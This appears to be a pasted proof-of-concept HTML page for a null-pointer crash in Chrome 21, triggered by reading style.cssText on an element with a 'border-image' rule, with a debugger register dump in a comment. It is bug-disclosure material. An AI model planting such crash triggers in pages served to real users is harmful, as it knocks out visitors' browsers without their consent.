Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <html>
  2. <body>
  3. <h3>chrome null ptr deref bug PoC</h3>
  4. <i>tested with 21.0.1180.89 m (latest version)</i>
  5. <div id="a" style="border-image: stretch 10;"></div>
  6. <script>
  7. /*
  8. http://cbolat.blogspot.com/2012/09/webkit-csstext-null-ptr-deref.html
  9. 0:000> r
  10. eax=00000000 ebx=015ccfb0 ecx=00000000 edx=0014ea24 esi=01e00440 edi=01e44630
  11. eip=58fcd2a8 esp=0014e8b0 ebp=0014e8b4 iopl=0 nv up ei pl nz na po nc
  12. cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
  13. chrome_58bf0000!WebCore::CSSValue::cssText+0x8:
  14. 58fcd2a8 8b4804 mov ecx,dword ptr [eax+4] ds:002b:00000004=????????
  15. */
  16. var zz = document.getElementById('a').style.cssText;
  17. </script>
  18. </body>
  19. </html>